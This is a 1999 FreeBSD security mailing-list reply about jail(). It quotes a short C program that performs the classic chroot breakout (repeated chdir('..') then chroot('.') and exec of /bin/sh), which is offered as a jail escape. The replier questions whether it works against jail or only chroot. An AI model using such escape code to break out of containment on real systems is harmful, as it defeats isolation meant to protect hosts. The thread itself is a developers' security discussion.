Date:      Sat, 25 Sep 1999 15:38:29 +0200
From:      Harold Gutch <logix@foobar.franken.de>
To:        Alexander Bezroutchko <abb@zenon.net>, freebsd-security@FreeBSD.ORG, freebsd-hackers@FreeBSD.ORG
Subject:   Re: about jail
Message-ID:  <19990925153829.B14097@foobar.franken.de>
In-Reply-To: <19990925171712.A80535@zenon.net>; from Alexander Bezroutchko on Sat, Sep 25, 1999 at 05:17:12PM +0400
References:  <199909251302.RAA58030@grendel.sovlink.ru> <19990925171712.A80535@zenon.net>

On Sat, Sep 25, 1999 at 05:17:12PM +0400, Alexander Bezroutchko wrote:
> * it is possible to escape from jail
>  Following program escapes from jail (tested under 4.0-19990918-CURRENT):
> 
>  /* --- start of example ------------------------- */
>  #include <unistd.h>
>  #include <assert.h>
> 
>  const char *shell = "/bin/sh";
>  const char *lowerdir = "/tmp";
> 
>  int main() {
>         int i;
> 
>         assert(chdir("/") != -1);
>         assert(chroot(lowerdir) != -1);
>         for (i = 0; i < 32; i++)
>                 assert(chdir("..") != -1);
>         assert(chroot(".") != -1);
> 
>         assert(execl(shell, shell, NULL) != -1);
>  };
>  /* --- end of example --------------------------- */
> 
I don't run -CURRENT, so I can't test this - but this is the
standard chroot()-breakout, and you're saying that using it you
can break out of a _jail_ as well? Or are you simply mixing up
jail() and chroot()?

bye,
  Harold

-- 
<Shabby> Sleep is an abstinence syndrome which occurs due to lack of caffeine.
Wed Mar  4 04:53:33 CET 1998   #unix, ircnet

